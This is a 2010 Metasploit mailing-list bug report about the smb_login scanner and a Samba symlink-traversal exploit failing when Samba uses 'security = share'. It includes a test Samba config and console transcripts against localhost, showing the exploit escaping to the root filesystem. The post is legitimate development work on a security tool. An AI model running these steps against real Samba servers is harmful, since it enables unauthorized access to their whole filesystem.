Metasploit mailing list archives
smb_login and "security = share"
From: Nicob <nicob () nicob net>
Date: Fri, 12 Feb 2010 00:33:21 +0100
Hello, it seems that Metasploit (svn r8458) can't fully login to a Samba share (and exploit the symlink vulnerability) when the Samba "security" option is set to "share" (instead of "user"). However, the exploit based on kingcope's modified smbclient is working fine in both situations. [-=-] Config : nicob is a valid user, his password is tototo user ffffff doesn't exist [global] lanman auth = yes workgroup = HOME netbios name = HOME security = [security or user] encrypt passwords = yes passdb backend = smbpasswd smb passwd file = /etc/samba/msf_passwd browseable = yes [NAS] path=/tmp/ comment = NAS Share browseable = yes read only = no [-=-] if security = share : msf > use auxiliary/scanner/smb/smb_login msf auxiliary(smb_login) > set RHOSTS 127.0.0.1 RHOSTS => 127.0.0.1 msf auxiliary(smb_login) > set SMBPass tototo SMBPass => tototo msf auxiliary(smb_login) > set SMBUser nicob SMBUser => nicob msf auxiliary(smb_login) > run [*] Starting host 127.0.0.1 [*] 127.0.0.1 - GUEST LOGIN (Unix) nicob : tototo [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(smb_login) > set SMBUser fffffff SMBUser => fffffff msf auxiliary(smb_login) > set SMBPass foo SMBPass => foo msf auxiliary(smb_login) > rerun [*] Starting host 127.0.0.1 [*] 127.0.0.1 - GUEST LOGIN (Unix) ffffff : foo [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed => only "GUEST" access is detected => username and password are irrelevant msf auxiliary(samba_symlink_traversal) > rerun [*] Connecting to the server... [*] Trying to mount writeable share 'NAS'... [-] Auxiliary failed: Rex::Proto::SMB::Exceptions::ErrorCode The server responded with error: STATUS_WRONG_PASSWORD (Command=117 WordCount=0) [-] Call stack: [-] xxx/trunk/lib/rex/proto/smb/client.rb:176:in `smb_recv_parse' [-] xxx/trunk/lib/rex/proto/smb/client.rb:951:in `tree_connect' [-] xxx/trunk/lib/rex/proto/smb/simpleclient.rb:253:in `connect' [-] (eval):64:in `run' [*] Auxiliary module execution completed => exploit failed [-=-] if security = user : msf > use auxiliary/scanner/smb/smb_login msf auxiliary(smb_login) > set RHOSTS 127.0.0.1 RHOSTS => 127.0.0.1 msf auxiliary(smb_login) > set SMBPass tototo SMBPass => tototo msf auxiliary(smb_login) > set SMBUser nicob SMBUser => nicob msf auxiliary(smb_login) > run [*] Starting host 127.0.0.1 [+] 127.0.0.1 - SUCCESSFUL LOGIN (Unix) 'nicob' : 'tototo' [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed => nicob/tototo is detected as a valid login msf auxiliary(samba_symlink_traversal) > rerun [*] Connecting to the server... [*] Trying to mount writeable share 'NAS'... [*] Trying to link 'escape' to the root filesystem... [*] Now access the following share to browse the root filesystem: [*] \\127.0.0.1\NAS\escape\ [*] Auxiliary module execution completed => exploit is working Nicob _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- smb_login and "security = share" Nicob (Feb 11)
- Re: smb_login and "security = share" HD Moore (Feb 11)
- Re: smb_login and "security = share" Nicob (Feb 11)
- Re: smb_login and "security = share" Nicob (Feb 13)
- Re: smb_login and "security = share" HD Moore (Feb 11)